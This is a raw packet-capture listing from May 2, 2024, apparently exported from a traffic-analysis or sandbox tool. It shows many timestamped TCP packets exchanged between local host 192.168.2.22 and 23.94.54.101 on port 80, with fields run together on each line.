                                                                                                                                              May 2, 2024 04:54:53.746958971 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.746993065 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.747241974 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.747256994 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.747293949 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.747360945 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.747374058 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.747385025 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.747397900 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.747411966 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.747436047 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.747436047 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.747463942 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.747497082 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.748163939 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.748178005 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.748189926 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.748202085 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.748209953 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.748239994 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.748641968 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.748682976 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.748709917 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.748718977 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.748733997 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.748769045 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.748927116 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.748982906 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.748996019 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749022961 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749036074 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.749093056 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749105930 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749139071 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.749159098 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749171972 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749206066 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.749214888 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749228001 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749264002 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.749274969 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749340057 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749377966 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749382973 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.749392986 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749417067 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749438047 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.749439955 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749481916 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.749505997 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749519110 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.749555111 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.749619007 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.750327110 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.853307962 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.853435993 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.853482962 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.853507996 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.853569984 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.853611946 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.853647947 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.853782892 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.853823900 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.853893995 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.853960991 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854001045 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.854051113 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854115009 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854151011 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.854159117 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854203939 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854238033 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.854262114 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854309082 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854346991 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.854371071 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854424000 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854461908 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.854474068 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854542971 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854583979 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.854659081 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854747057 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854784012 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.854820967 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854887009 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854926109 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.854933977 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.854980946 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.855016947 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.855123043 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.855195045 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.855221987 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.855370045 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.855413914 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.855546951 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.855690002 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.855732918 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.855896950 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.855998993 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856040001 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.856091022 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856141090 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856184006 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.856317043 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856319904 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.856409073 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856450081 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.856462002 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856520891 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856544018 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856564045 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.856587887 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856633902 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.856650114 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856723070 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856764078 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.856786966 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856836081 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856872082 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856880903 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.856954098 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.856996059 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.857007027 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857065916 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.857163906 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857271910 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857319117 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.857338905 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857352972 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857384920 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.857393980 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857419968 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857458115 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.857498884 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857548952 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857585907 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.857585907 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857639074 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857676983 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.857728958 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857788086 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857825994 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.857831001 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.857997894 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858006954 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.858042002 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858087063 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.858122110 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858194113 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858234882 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.858247042 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858350039 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858392000 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.858412981 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858463049 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858510017 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.858534098 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858738899 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858793974 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.858814001 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858889103 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858915091 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858927965 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.858951092 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.858989954 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.859026909 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.859117031 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.859155893 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.859380960 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.859436035 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.859469891 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.859493971 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.859541893 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.859591007 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.859613895 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.859680891 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.859698057 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.859761953 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.859806061 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.859843969 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.859899998 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.859954119 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.859983921 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860084057 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860115051 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860121012 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.860152006 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860193014 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.860215902 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860285044 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860328913 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860328913 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.860373974 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860420942 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.860444069 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860544920 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860585928 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.860604048 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860675097 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860713005 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.860788107 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860867023 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860904932 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.860963106 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.860992908 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861028910 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.861067057 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861136913 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861171961 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.861196041 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861246109 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861284018 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.861308098 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861373901 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861413002 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.861418962 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861485004 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.861489058 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861536980 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861576080 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.861599922 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861697912 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861737967 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.861763000 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861857891 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.861895084 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.861963987 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862046003 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862082005 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.862092018 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862147093 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862188101 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.862195015 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862235069 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862270117 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.862340927 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862373114 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862413883 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.862438917 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862536907 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862576962 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.862591028 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862644911 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862683058 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.862705946 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862806082 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862843990 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862843990 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.862895966 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.862936974 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.862956047 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863022089 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863058090 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.863075018 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863171101 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863209963 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.863229990 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863293886 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863337994 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.863390923 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863404989 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863447905 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.863524914 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863571882 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863615036 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.863640070 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863738060 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863782883 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.863818884 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863869905 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863914013 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.863936901 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.863950014 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.864005089 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864046097 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864048004 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.864141941 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864180088 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.864214897 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864316940 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864339113 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864350080 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.864420891 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864463091 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864464045 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.864530087 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864563942 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.864588022 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864659071 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864696026 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864696980 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.864742994 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864788055 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.864829063 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864908934 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864984989 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.864993095 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.865027905 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.865073919 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.865109921 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.865147114 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.865192890 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.865206003 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.865351915 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.865396023 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.865446091 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.865670919 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.865732908 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.865819931 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.865855932 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.865892887 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.865916014 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.865988016 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.866025925 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.866049051 CEST804916123.94.54.101192.168.2.22
